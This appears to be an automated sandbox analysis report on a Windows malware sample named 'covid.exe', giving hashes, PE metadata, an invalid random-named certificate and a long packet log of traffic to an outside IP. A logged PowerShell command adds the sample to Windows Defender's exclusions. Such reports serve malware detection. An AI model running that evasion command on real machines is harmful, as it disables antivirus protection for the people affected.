                                                                Preview: .**********************..Windows PowerShell transcript start..Start time: 20210420230002..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 715575 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\covid.exe -Force..Process ID: 6196..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210420230002..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\covid.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210420230320..Username: computer\user..RunAs User: DESKTOP-716T
                                                                C:\Users\user\MhpbFtoGWNhTPjKfwzuGgRGxjpGzfVWGJwHUxEjlTdnPIXFwm
                                                                Process:C:\Users\user\Desktop\covid.exe
                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):2679790
                                                                Entropy (8bit):3.071546356466385
                                                                Encrypted:false
                                                                SSDEEP:12288:HOgjCfV50UYJ9zyVM8f92Ev+EZBQth8tCFiAdA9JW21OgjCfV50UYJ9zyVM8f92T:HdNYRXv6iT1dNYRXv6iTS
                                                                MD5:1F6602BC19F05B583F8EC310007B038B
                                                                SHA1:F7DC5C858BEBD19F80EF0969308758283D4B5B56
                                                                SHA-256:85709EC49736BD005624D4B542222DAAE924D277AD468B21FF2775674CEEE5CA
                                                                SHA-512:69D60D9F5BFA84BA3664B6E135739A5FE3F52C2F5F0C7FF88B4A2198CE8C257251B5EA74514460CA24E46098BA0136AE9F7330E7522849B2A749CBF6FBC34356
                                                                Malicious:false
                                                                Preview: SS Of yQQ f F f f f Q f f f exx exx f f yCQ f f f f f f f wQ f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f yeC f f f yQ Fy yCw yQ f yCf O efx FF yCQ y Sw efx FF CQ yfQ yfx yyx Fe yye yyQ yyy yfF yyQ OS yfO Fe OO OS yyf yyf yyy yyw Fe OC yfy Fe yyQ yyS yyf Fe yfx yyf Fe wC SO CF Fe yfO yyy yff yfy Qw yF yF yf Fw f f f f f f f Cf wO f f Sw y F f OS yFC yxC eew f f f f f f f f eeQ f FQ f yy y Cf f f we C f f w f f f f f f eFC OF C f f Fe f f f Ow C f f f f yw f Fe f f f e f f Q f f f f f f f w f f f f f f f f ywf C f f e f f f f f f e f Ow yFF f f yw f f yw f f f f yw f f yw f f f f f f yw f f f f f f f f f f f yxe OF C f CF f f f f Ow C f CC F f f f f f f f f f f f f f f f f f f f yeC C f ye f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f Fe f f C f f f f f f f f f f f C Fe f f Se f f f f f f f f f f f Qw yyw yfy yef yyw f f f eQQ wy C f f Fe f f f we C f f e f f f f f f f f f f f f f f Fe f f Ow Qw yyQ yyx y

                                                                Static File Info

                                                                General

                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Entropy (8bit):5.605387718409897
                                                                TrID:
                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                                                • Win32 Executable (generic) a (10002005/4) 49.93%
                                                                • Windows Screen Saver (13104/52) 0.07%
                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                File name:covid.exe
                                                                File size:39624
                                                                MD5:99e3b458dee79b33209d39d19692ae08
                                                                SHA1:63b68db39d6e39be7564b2fb28f1a3070b127444
                                                                SHA256:87bb35a04c91b5005806b4893ad4dc594c8b73d228150597cde89b39f79af9b0
                                                                SHA512:79c087ff41871e03523feee4eee606f27bc59c5213c259df713f1fc0bc860b7846757136ce8b9a9755210aa38192c813eb87131afcaa18c5dec0b5d70060a3a4
                                                                SSDEEP:384:6pJWGVGYxA5sJ8wCo9GTqsm3bdioR+BA8Z/itiB6j4lsTgR8engVEWfNpi/wOpzA:0LX9XbdM56wWoyey/Vcrpti6lhMx
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@............."...0..|............... ........@.. ...............................'....@................................

                                                                File Icon

                                                                Icon Hash:00828e8e8686b000

                                                                Static PE Info

                                                                General

                                                                Entrypoint:0x409ace
                                                                Entrypoint Section:.text
                                                                Digitally signed:true
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                Time Stamp:0xFBC3D040 [Wed Nov 7 21:27:28 2103 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:v4.0.30319
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                Authenticode Signature

                                                                Signature Valid:false
                                                                Signature Issuer:C=szVxyAJUgIO, S=QvMaHIZFeWiNZAyrVgOHIpUEkCsLuXNwCwUaECN, L=SAEPLQtKwrCubzBCvJwUGhgHcpoX, T=UEtlUJxBQgjRpnGwZ, E=xQHJQVqKtSlzrhrjyJrHlhDanRcPfDgugHLaHeHSgJM, OU=yNwtfMPSCcaHazxQc, O=vcpjxmifdFnpQfuePNDGSWKiRoN, CN=FwqAJuZxZSRovPsSYLDKNCRckToEsjfnIDTIKgxPlafxXyd
                                                                Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                Error Number:-2146762487
                                                                Not Before, Not After
                                                                • 4/19/2021 9:43:47 AM 4/19/2022 9:43:47 AM
                                                                Subject Chain
                                                                • C=szVxyAJUgIO, S=QvMaHIZFeWiNZAyrVgOHIpUEkCsLuXNwCwUaECN, L=SAEPLQtKwrCubzBCvJwUGhgHcpoX, T=UEtlUJxBQgjRpnGwZ, E=xQHJQVqKtSlzrhrjyJrHlhDanRcPfDgugHLaHeHSgJM, OU=yNwtfMPSCcaHazxQc, O=vcpjxmifdFnpQfuePNDGSWKiRoN, CN=FwqAJuZxZSRovPsSYLDKNCRckToEsjfnIDTIKgxPlafxXyd
                                                                Version:3
                                                                Thumbprint MD5:05B1F24EB4299E74171523A6BAE99247
                                                                Thumbprint SHA-1:9220EF39055DD6D18D9B7A41230CEAA4F76B5358
                                                                Thumbprint SHA-256:41523B79D33BAD1F3D99CB31EEABD79B3B6F28E870E01800A08B4C5B36B5FEEF
                                                                Serial:00B8BEE23D8FB88CA889DAD9E6D2F8C69D

                                                                Entrypoint Preview

                                                                Instruction
                                                                jmp dword ptr [00402000h]
                                                                add byte ptr [eax], al

                                                                Data Directories

                                                                Name | Virtual Address | Virtual Size | Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x9a78 | 0x53 | .text
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xa000 | 0x588 | .rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x8600 | 0x14c8 | .text
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc000 | 0xc | .reloc
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                                Sections

                                                                Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                .text | 0x2000 | 0x7ad4 | 0x7c00 | False | 0.413904989919 | data | 5.18958268075 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                .rsrc | 0xa000 | 0x588 | 0x600 | False | 0.412109375 | data | 4.00563976551 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .reloc | 0xc000 | 0xc | 0x200 | False | 0.044921875 | data | 0.0815394123432 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                Resources

                                                                Name | RVA | Size | Type | Language | Country
                                                                RT_VERSION | 0xa0a0 | 0x2fc | data | |
                                                                RT_MANIFEST | 0xa39c | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

                                                                Imports

                                                                DLL | Import
                                                                mscoree.dll | _CorExeMain

                                                                Version Infos

                                                                Description | Data
                                                                Translation | 0x0000 0x04b0
                                                                LegalCopyright | Copyright 2021
                                                                Assembly Version | 1.0.0.0
                                                                InternalName | ahmed.exe
                                                                FileVersion | 1.0.0.0
                                                                CompanyName |
                                                                LegalTrademarks |
                                                                Comments |
                                                                ProductName | ahmed
                                                                ProductVersion | 1.0.0.0
                                                                FileDescription | ahmed
                                                                OriginalFilename | ahmed.exe

                                                                Network Behavior

                                                                Network Port Distribution

                                                                TCP Packets

                                                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                Apr 20, 2021 22:59:11.631361008 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
                                                                Apr 20, 2021 22:59:11.684120893 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
                                                                Apr 20, 2021 22:59:11.684290886 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
                                                                Apr 20, 2021 22:59:11.684930086 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
                                                                Apr 20, 2021 22:59:11.737579107 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
                                                                Apr 20, 2021 22:59:11.937634945 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
                                                                Apr 20, 2021 22:59:11.937678099 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
                                                                Apr 20, 2021 22:59:11.937705040 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
                                                                Apr 20, 2021 22:59:11.937730074 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
                                                                Apr 20, 2021 22:59:11.937752008 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
                                                                Apr 20, 2021 22:59:11.937766075 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
                                                                Apr 20, 2021 22:59:11.937773943 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
                                                                Apr 20, 2021 22:59:11.937797070 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
                                                                Apr 20, 2021 22:59:11.937799931 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
                                                                Apr 20, 2021 22:59:11.937844992 CEST | 49702 | 80 | 192.168.2.7 | 172.67.220.147
                                                                Apr 20, 2021 22:59:12.198029995 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
                                                                Apr 20, 2021 22:59:12.198069096 CEST | 80 | 49702 | 172.67.220.147 | 192.168.2.7
                                                                Apr 20, 2021 22:59:12.198093891 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.198117971 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.198215961 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.199172974 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.199203968 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.199322939 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.200407982 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.200443983 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.200520039 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.201627970 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.201658010 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.201726913 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.202872038 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.202903032 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.202970028 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.204102993 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.204137087 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.204205036 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.205338955 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.205370903 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.205456018 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.206574917 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.206608057 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.206665993 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.207807064 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.207839012 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.207930088 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.209031105 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.209063053 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.209140062 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.210285902 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.210319996 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.210378885 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.211505890 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.211539030 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.211630106 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.212704897 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.212738037 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.212824106 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.213963985 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.213995934 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.214071989 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.215200901 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.215233088 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.215316057 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.216418028 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.216451883 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.216502905 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.217673063 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.217705011 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.217761993 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.218903065 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.251354933 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.251394033 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.251491070 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.251885891 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.251910925 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.251960039 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.253123045 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.253155947 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.253201008 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.254389048 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.254422903 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.254458904 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.255589008 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.255621910 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.255660057 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.256850004 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.256885052 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.256927013 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.258069992 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.258120060 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.258141994 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.259304047 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.259340048 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.259386063 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.260538101 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.260572910 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.260629892 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.261760950 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.261797905 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.261840105 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.263015985 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.263092041 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.263585091 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.263617039 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.263689995 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.264803886 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.264837027 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.264919996 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.266072989 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.266134024 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.266208887 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.267309904 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.267340899 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.267402887 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.268522024 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.268554926 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.268630981 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.269800901 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.269834995 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.269906998 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.271003962 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.271056890 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.271114111 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.272216082 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.272250891 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.272317886 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.273452044 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.273483038 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.273535967 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.274821997 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.274878979 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.274936914 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.275929928 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.275966883 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.276030064 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.277192116 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.277226925 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.277280092 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.278378010 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.278413057 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.278474092 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.304162979 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.304202080 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.304311037 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.304883003 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.304919958 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.304996014 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.305973053 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.306005001 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.306050062 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.307002068 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.307034969 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.307076931 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.308373928 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.308499098 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.308572054 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.310048103 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.310087919 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.310156107 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.310689926 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.310723066 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.310830116 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.311922073 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.311953068 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.311997890 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.313179970 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.313209057 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.313258886 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.314413071 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.314448118 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.314497948 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.315660000 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.315694094 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.315737009 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.316225052 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.316251040 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.316310883 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.317658901 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.317689896 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.317781925 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.318906069 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.319130898 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.319195032 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.319998026 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.320029020 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.320085049 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.321213007 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.321247101 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.321310997 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.322590113 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.322627068 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.322680950 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.323668003 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.323702097 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.323898077 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.324982882 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.325021029 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.325088024 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.326138973 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.326172113 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.326215982 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.327485085 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.327521086 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.327609062 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.328547955 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.328583002 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.328650951 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.329829931 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.329865932 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.329915047 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.331026077 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.331059933 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.331120968 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.356920004 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.356957912 CEST8049702172.67.220.147192.168.2.7
